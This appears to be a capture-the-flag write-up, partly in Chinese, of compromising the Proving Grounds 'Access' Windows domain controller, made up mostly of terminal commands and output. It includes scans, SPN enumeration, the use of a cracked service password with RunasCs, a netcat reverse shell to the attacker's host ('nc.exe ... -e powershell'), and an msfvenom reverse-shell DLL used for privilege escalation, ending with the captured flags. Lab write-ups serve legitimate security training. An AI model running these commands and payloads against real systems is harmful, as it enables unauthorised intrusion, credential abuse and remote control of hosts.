┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Access]└─$ sudo nmap -n -r --min-rate=3500 -sSV -T4 192.168.167.187
[sudo] xavier 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-11 23:53 CST
Nmap scan report for 192.168.167.187
Host is up (0.17s latency).
Not shown: 988 filtered tcp ports (no-response)PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-11 15:53:35Z)135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)3269/tcp open tcpwrapped
Service Info: Host: SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.97 seconds
Init Access
53-DNS
域传送失败
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(xavier㉿kali)-[~]└─$ dnsrecon -d access.offsec -n 192.168.167.187 -t axfr
[*] Checking for Zone Transfer for access.offsec name servers
[*] Resolving SOA Record
[+] SOA server.access.offsec 192.168.167.187
[*] Resolving NS Records
[*] NS Servers found:
[+] NS server.access.offsec 192.168.167.187
[*] Removing any duplicate NS server IP Addresses...
[*][*] Trying NS server 192.168.167.187
[+] 192.168.167.187 Has port 53 TCP Open
[-] Zone Transfer Failed (Zone transfer error: REFUSED)
┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Access]└─$ nc -nlvp 443listening on [any]443 ...
connect to [192.168.45.169] from (UNKNOWN)[192.168.167.187]50217Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs\uploads> whoami
whoami
access\svc_apache
PS C:\xampp\htdocs\uploads>
PS C:\tmp> dir C:\users\
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/28/2021 3:53 AM Administrator
d-r--- 5/28/2021 3:53 AM Public
d----- 4/8/2022 2:39 AM svc_apache
d----- 4/8/2022 2:40 AM svc_mssql
# Source / credit:# https://social.technet.microsoft.com/wiki/contents/articles/18996.active-directory-powershell-script-to-list-all-spns-used.aspxcls
$search=New-ObjectDirectoryServices.DirectorySearcher([ADSI]"")$search.filter="(servicePrincipalName=*)"## You can use this to filter for OU's:## $results = $search.Findall() | ?{ $_.path -like '*OU=whatever,DC=whatever,DC=whatever*' }$results=$search.Findall()foreach($resultin$results){$userEntry=$result.GetDirectoryEntry()Write-host"Object Name = "$userEntry.name-backgroundcolor"yellow"-foregroundcolor"black"Write-host"DN = "$userEntry.distinguishedNameWrite-host"Object Cat. = "$userEntry.objectCategoryWrite-host"servicePrincipalNames"$i=1foreach($SPNin$userEntry.servicePrincipalName){Write-host"SPN("$i") = "$SPN$i+=1}Write-host""}
PS C:\tmp> curl https://raw.githubusercontent.com/antonioCoco/RunasCs/master/Invoke-RunasCs.ps1 -o Invoke-RunasCs.ps1
curl https://raw.githubusercontent.com/antonioCoco/RunasCs/master/Invoke-RunasCs.ps1 -o Invoke-RunasCs.ps1
PS C:\tmp> ls
Directory: C:\tmp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/11/2024 8:50 AM 498700 1.txt
-a---- 1/11/2024 9:06 AM 0 2.txt
-a---- 1/11/2024 9:38 AM 883 Get-SPN.ps1
-a---- 1/11/2024 9:46 AM 46818 Invoke-Kerberoast.ps1
-a---- 1/11/2024 10:09 AM 88284 Invoke-RunasCs.ps1
-a---- 1/11/2024 8:45 AM 43696 nc.exe
-a---- 1/11/2024 8:49 AM 2029568 winPEASany.exe
PS C:\tmp> import-module ./Invoke-RunasCs.ps1
import-module ./Invoke-RunasCs.ps1
PS C:\tmp> Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami"Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami"[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
access\svc_mssql
PS C:\tmp> Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "C:\tmp\nc.exe 192.168.45.169 7777 -e powershell"Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "C:\tmp\nc.exe 192.168.45.169 7777 -e powershell"[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
1
2
3
4
5
PS C:\Windows\system32> cd C:\users\svc_mssql\Desktop\
cd C:\users\svc_mssql\Desktop\
PS C:\users\svc_mssql\Desktop> cat local.txt
cat local.txt
ac7cd92298a3ec65de98ea4c51f9e95e
PrivE
再次进行信息搜集
发现当前用户权限如下:
1
2
3
4
5
6
7
8
9
10
11
12
PS C:\tmp> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State=====================================================================SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Access]└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.169 LPORT=4444 -f dll -o tzres.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: tzres.dll
┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Access]└─$ nc -nlvp 4444listening on [any]4444 ...
connect to [192.168.45.169] from (UNKNOWN)[192.168.167.187]50960Microsoft Windows [Version 10.0.17763.2746](c)2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\network service
C:\Windows\system32>cd C:\users\administrator\desktop\
cd C:\users\administrator\desktop\
C:\Users\Administrator\Desktop>type proof.txt
type proof.txt
d0be636ebf08cd4c91a276012f25a135
Xavier 收录于 靶场
